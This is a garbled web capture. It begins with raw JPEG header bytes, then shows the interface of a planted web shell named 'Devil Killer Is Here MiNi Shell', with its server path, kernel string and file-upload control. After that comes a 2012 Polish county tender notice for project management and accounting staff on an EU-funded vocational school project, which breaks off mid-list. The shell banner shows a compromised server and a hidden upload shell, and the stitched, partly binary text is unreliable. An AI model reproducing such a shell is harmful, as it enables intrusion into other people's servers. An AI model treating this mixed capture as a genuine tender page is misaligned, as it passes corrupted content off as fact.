JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120810/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120810/296736-N-2012.html

<p class="kh_header"><b>Goleniów: Wyłonienie kadry zarządzającej i personelu pomocniczego do realizacji projektu p.n. Praktyka najlepszym nauczycielem</b><br>
<b>Numer ogłoszenia: 296736 - 2012; data zamieszczenia: 10.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Goleniowski , ul. Dworcowa 1, 72-100 Goleniów, woj. zachodniopomorskie, tel. 91 4180512, 4180361, faks 91 4182530.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-goleniowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyłonienie kadry zarządzającej i personelu pomocniczego do realizacji projektu p.n. Praktyka najlepszym nauczycielem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór kadry zarządzającej i personelu pomocniczego do realizacji projektu WND-POKL:.09.02.00-32-008/12 pn. Praktyka najlepszym nauczycielem Priorytet IX. Rozwój wykształcenia i kompetencji w regionach Działanie 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego realizowanego przez Powiat Goleniowski w okresie od 1 sierpnia 2012 r. do 30 czerwca 2015 r. Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.

1.	Dane dotyczące projektu:
Projektem zostanie objętych 743 uczniów z tego 310 z ZSZ w Goleniowie i 433 z ZSP w Nowogardzie.
Cel główny projektu to podniesienie do czerwca 2015 roku efektywności i rynkowości procesów kształcenia w technikach zawodowych poprzez wdrożenie dwóch programów rozwojowych ukierunkowanych na kształcenie elitarnych umiejętności zawodowych opartych na realizacji w ścisłej współpracy z pracodawcami praktycznych zajęć wyrównawczych, pozalekcyjnych praktyk, doradztwa edukacyjno zawodowego wsparcia pedagogicznego i e learningu. 
Termin  realizacji projektu: od dnia 01.08.2012 r. do 30.06.2015 r.

2.	Szczegółowy opis przedmiotu zamówienia:
1)	Postępowanie ma na celu powierzenie obowiązków Koordynatora projektu, Asystenta Koordynatora, Specjalisty ds. sprawozdawczości i przetargów stanowiących kadrę zarządzającą projektem określonym w ust. 1 oraz w ramach personelu pomocniczego Stanowiska ds. obsługi księgowej projektu POKL.
Świadczenie usług zarządzania projektem i obsługi księgowej odbywać się będzie na podstawie umowy - zlecenia i zostało podzielone na cztery części tj:
Część nr 1 - Koordynator,
Część nr 2 - Asystent Koordynatora,
Część nr 3 - Specjalista ds. sprawozdawczości i przetargów,
Część nr 4 - Stanowisko ds. obsługi księgowej projektu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.20.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W celu wykazania spełnienia przez Wykonawców warunków udziału w postepowaniu o których mowa w art. 22 ust 1 ustawy każdy z Wykonawców złoży w ofercie:
1)	Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 według wzoru stanowiącego Załącznik nr 3 do SIWZ- w zakresie części od 1 do 4,
2)	W zakresie części 1 Koordynator:
a)	wykaz wykonanych przez Wykonawcę w okresie ostatnich trzech lat usług, w zakresie zarządzania projektem dofinansowanym z Europejskiego Funduszu Społecznego (EFS) z podaniem tytułu projektu stanowiska/funkcji w projekcie, wartości projektu, daty wykonania, danych odbiorcy-beneficjenta wg Załącznika nr 5 oraz oświadczenia, że usługa została wykonana należycie. W przypadku rozliczeń za wykonane usługi w walucie innej niż PLN należy przeliczyć wartość tych usług na PLN stosując kurs ustalony i opublikowany przez NBP z dnia zawarcia umowy ze zlecającym,
b)	wykaz osób, które będą wykonywać zamówienie wg wzoru stanowiącego Załącznik nr 6/1 do niniejszej SIWZ,
3)	W zakresie części 2  Asystent Koordynatora:
a)	wykaz wykonanych przez Wykonawcę w okresie ostatnich trzech lat usług, w zakresie zarządzania projektem dofinansowanym z Europejskiego Funduszu Społecznego (EFS) z podaniem tytułu projektu stanowiska/funkcji w projekcie, wartości projektu, daty wykonania, danych odbiorcy-beneficjenta wg Załącznika nr 5 oraz oświadczenia, że usługa została wykonana należycie. W przypadku rozliczeń za wykonane usługi w walucie innej niż PLN należy przeliczyć wartość tych usług na PLN stosując kurs ustalony i opublikowany przez NBP z dnia zawarcia umowy ze zlecającym,
b)	wykaz osób, które będą wykonywać zamówienie wg wzoru stanowiącego Załącznik nr 6/2 do niniejszej SIWZ,
4)	W zakresie części 3- Specjalista ds. sprawozdawczości i przetargów:
a)	wykaz wykonanych przez Wykonawcę usług, w zakresie przeprowadzonych postepowań przetargowych oraz wykaz wykonywanych usług w zakresie rozliczania projektów dofinansowanym z Europejskiego Funduszu Społecznego (EFS) z podaniem tytułu projektu stanowiska/funkcji w projekcie, wartości projektu, daty wykonania, danych odbiorcy-beneficjenta wg Załącznika nr 5 oraz oświadczenia, że usługa została wykonana należycie. W przypadku rozliczeń za wykonane usługi w walucie innej niż PLN należy przeliczyć wartość tych usług na PLN stosując kurs ustalony i opublikowany przez NBP z dnia zawarcia umowy ze zlecającym,
b)	wykaz osób, które będą wykonywać zamówienie wg wzoru stanowiącego Załącznik nr 6/3 do niniejszej SIWZ
5)	W zakresie części 4 - Stanowisko ds. obsługi księgowej projektu:
a)	wykaz wykonanych przez Wykonawcę usług w zakresie księgowania projektów dofinansowanych z Europejskiego Funduszu Społecznego (EFS) z podaniem tytułu projektu stanowiska/funkcji w projekcie, wartości projektu, daty wykonania, danych odbiorcy-beneficjenta wg Załącznika nr 5 oraz oświadczenia, że usługa została wykonana należycie. W przypadku rozliczeń za wykonane usługi w walucie innej niż PLN należy przeliczyć wartość tych usług na PLN stosując kurs ustalony i opublikowany przez NBP z dnia zawarcia umowy ze zlecającym,
b)	wykaz osób, które będą wykonywać zamówienie wg wzoru stanowiącego Załącznik nr 6/4 do niniejszej SIWZ,
6)	Pisemne zobowiązanie innych podmiotów do udostepnienia zasobów niezbędnych do realizacji zamówienia, jeżeli Wykonawca, wskazując spełnienie warunków o których mowa w art. 22 ust. 1 ustawy, polegał będzie na zasobach tych podmiotów na zasadach określonych w art. 26 ust 2b ustawy w zakresie części od 1 do 4.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W celu wykazania spełnienia przez Wykonawców warunków udziału w postepowaniu o których mowa w art. 22 ust 1 ustawy każdy z Wykonawców złoży w ofercie:
1)	Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 według wzoru stanowiącego Załącznik nr 3 do SIWZ- w zakresie części od 1 do 4,
2)	W zakresie części 1 Koordynator:
a)	wykaz wykonanych przez Wykonawcę w okresie ostatnich trzech lat usług, w zakresie zarządzania projektem dofinansowanym z Europejskiego Funduszu Społecznego (EFS) z podaniem tytułu projektu stanowiska/funkcji w projekcie, wartości projektu, daty wykonania, danych odbiorcy-beneficjenta wg Załącznika nr 5 oraz oświadczenia, że usługa została wykonana należycie. W przypadku rozliczeń za wykonane usługi w walucie innej niż PLN należy przeliczyć wartość tych usług na PLN stosując kurs ustalony i opublikowany przez NBP z dnia zawarcia umowy ze zlecającym,
b)	wykaz osób, które będą wykonywać zamówienie wg wzoru stanowiącego Załącznik nr 6/1 do niniejszej SIWZ,
3)	W zakresie części 2  Asystent Koordynatora:
a)	wykaz wykonanych przez Wykonawcę w okresie ostatnich trzech lat usług, w zakresie zarządzania projektem dofinansowanym z Europejskiego Funduszu Społecznego (EFS) z podaniem tytułu projektu stanowiska/funkcji w projekcie, wartości projektu, daty wykonania, danych odbiorcy-beneficjenta wg Załącznika nr 5 oraz oświadczenia, że usługa została wykonana należycie. W przypadku rozliczeń za wykonane usługi w walucie innej niż PLN należy przeliczyć wartość tych usług na PLN stosując kurs ustalony i opublikowany przez NBP z dnia zawarcia umowy ze zlecającym,
b)	wykaz osób, które będą wykonywać zamówienie wg wzoru stanowiącego Załącznik nr 6/2 do niniejszej SIWZ,
4)	W zakresie części 3- Specjalista ds. sprawozdawczości i przetargów:
a)	wykaz wykonanych przez Wykonawcę usług, w zakresie przeprowadzonych postepowań przetargowych oraz wykaz wykonywanych usług w zakresie rozliczania projektów dofinansowanym z Europejskiego Funduszu Społecznego (EFS) z podaniem tytułu projektu stanowiska/funkcji w projekcie, wartości projektu, daty wykonania, danych odbiorcy-beneficjenta wg Załącznika nr 5 oraz oświadczenia, że usługa została wykonana należycie. W przypadku rozliczeń za wykonane usługi w walucie innej niż PLN należy przeliczyć wartość tych usług na PLN stosując kurs ustalony i opublikowany przez NBP z dnia zawarcia umowy ze zlecającym,
b)	wykaz osób, które będą wykonywać zamówienie wg wzoru stanowiącego Załącznik nr 6/3 do niniejszej SIWZ
5)	W zakresie części 4 - Stanowisko ds. obsługi księgowej projektu:
a)	wykaz wykonanych przez Wykonawcę usług w zakresie księgowania projektów dofinansowanych z Europejskiego Funduszu Społecznego (EFS) z podaniem tytułu projektu stanowiska/funkcji w projekcie, wartości projektu, daty wykonania, danych odbiorcy-beneficjenta wg Załącznika nr 5 oraz oświadczenia, że usługa została wykonana należycie. W przypadku rozliczeń za wykonane usługi w walucie innej niż PLN należy przeliczyć wartość tych usług na PLN stosując kurs ustalony i opublikowany przez NBP z dnia zawarcia umowy ze zlecającym,
b)	wykaz osób, które będą wykonywać zamówienie wg wzoru stanowiącego Załącznik nr 6/4 do niniejszej SIWZ,
6)	Pisemne zobowiązanie innych podmiotów do udostepnienia zasobów niezbędnych do realizacji zamówienia, jeżeli Wykonawca, wskazując spełnienie warunków o których mowa w art. 22 ust. 1 ustawy, polegał będzie na zasobach tych podmiotów na zasadach określonych w art. 26 ust 2b ustawy w zakresie części od 1 do 4.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://spow.goleniow.ibip.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://spow.goleniow.ibip.pl/public/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 10:00, miejsce: Starostwo Powiatowe, ul.Dworcowa 1,72-100 Goleniów - Sekretariat pok.121.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie dofinansowane ze środków UE w ramach 
Europejskiego Funduszu Społecznego 
Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,
działanie 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Koordynator.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	zapewnienie terminowej realizacji działań wynikających z Harmonogramu realizacji projektu oraz koordynowanie tych działań,
b)	sprawowanie całościowego nadzoru nad realizacją Projektu,
c)	nadzór merytoryczny nad zajęciami pozalekcyjnymi prowadzonymi w ramach projektu, 
d)	zarządzania planowanymi działaniami projektowymi,
e)	prowadzenie dokumentacji projektowej w oparciu o obowiązujące zapisy zgodnie z Programem Operacyjnym Kapitał Ludzki,
f)	opracowanie wspólnie z Asystentem regulaminów rekrutacji i uczestnictwa w projekcie,
g)	organizacja i monitoring zadań wynikających z wniosku i Harmonogramu realizacji projektu,
h)	organizacja dodatkowych elementów związanych z realizacją zajęć przewidzianych w ramach projektu,
i)	nadzór nad bieżącą dokumentacją i zarządzanie budżetem,
j)	nadzór nad prawidłowym przebiegiem realizacji projektu zgodnie z Harmonogramem i budżetem,
k)	dokonywanie systematycznej kontroli pracy i uzyskanych efektów,
l)	wprowadzanie zmian do projektu w oparciu o  obowiązujące zapisy zawarte w dokumentacji konkursowej, umowie o dofinansowanie projektu, w dokumentach programowych Programu Operacyjnego Kapitał Ludzki,
m)	sporządzanie części merytorycznej wniosków o płatność,
n)	organizacja promocji projektu,
o)	reprezentowanie projektu na zewnątrz, udział w kampaniach promocyjno- informacyjnych,
p)	współpraca przy wyborze Wykonawców,
q)	kontaktowanie się z instytucją wdrażającą oraz pośredniczącą i innymi instytucjami lub organizacjami zaangażowanymi bezpośrednio lub pośrednio w realizację projektu,
r)	nadzorowanie organizacji zamówień publicznych,
s)	dyspozycyjność - praca na umowę zlecenie w wymiarze 80 godzin miesięcznie,
t)	codzienna obecność przynajmniej w jednej jednostce w której realizowany będzie projekt tj. Zespół Szkół Ponadgimnazjalnych w Nowogardzie lub Zespół Szkół Zawodowych w Goleniowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Asystent Koordynatora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	opracowanie wspólnie z Koordynatorem projektu regulaminów rekrutacji i uczestnictwa w projekcie,
b)	opracowanie wspólnie z przedstawicielami Pracodawców programu praktyk,
c)	wykonywanie zadań składających się na proces rekrutacji BO,
d)	prowadzenie bazy uczestników;
e)	logistyczna organizacja zajęć wyrównawczych i pozalekcyjnych oraz  praktyk, wynikających z wniosku o dofinansowanie,
f)	wybór we współpracy z prowadzącymi zajęcia materiałów dydaktycznych,
g)	kontrola dokumentacji prowadzonych zajęć wyrównawczych i praktyk,
h)	ewidencja dokumentów,
i)	dokonywanie zakupów na rzecz projektu,
j)	sporządzanie sprawozdań w ramach PEFS,
k)	współpraca z koordynatorem,
l)	dyspozycyjność - praca na umowę zlecenie w wymiarze 80 godzin miesięcznie,
m)	codzienna obecność przynajmniej w jednej jednostce w której realizowany będzie projekt tj. Zespół Szkół Ponadgimnazjalnych w Nowogardzie lub Zespół Szkół Zawodowych w Goleniowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Specjalista ds. sprawozdawczości i przetargów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	kontrola poprawności formalnej księgowych i finansowych dokumentów projektu;
b)	kontrola księgowania kosztów projektu pod kątem spełnienia kryteriów dla tzw; wydatków kwalifikowanych, a w szczególności sprawdzenia czy są: konieczne dla wykonania zadań określonych projektem; związane z finansowaniem umów zawartych przez zamawiającego w celu osiągnięcia zadań wynikających z opisu projektu i czy są związane z realizacją projektu; udokumentowane odpowiednimi i prawidłowo sporządzonymi dokumentami źródłowymi;
c)	przygotowywanie zgodnie z wytycznymi części finansowej wniosku o płatności pośrednie i płatność końcową,
d)	monitoring wydatkowanych środków,
e)	analiza postępu finansowego realizacji projektu,
f)	wykonywanie czynności w zakresie formalno-prawnego przygotowywania i przeprowadzania postępowań o udzielanie zamówień publicznych i zapytań o cenę związanych z realizacją projektu,
g)	sporządzanie umów z Wykonawcami i Personelem projektu wyłonionym w trybie zamówień publicznych,
h)	udział w pracach komisji przetargowej powołanej do postępowań związanych z projektem;
i)	prowadzenie korespondencji (odpowiedzi na zapytania, zawiadomienia, pisma wynikające z procedur odwoławczych itp.);
j)	prowadzenie dokumentacji kadrowej osób zatrudnionych w projekcie,
k)	dyspozycyjność - praca na umowę zlecenie w wymiarze 60 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Stanowisko ds. obsługi księgowej projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	naliczanie płac i pochodnych dla personelu projektu;
b)	rozliczanie składek ZUS;
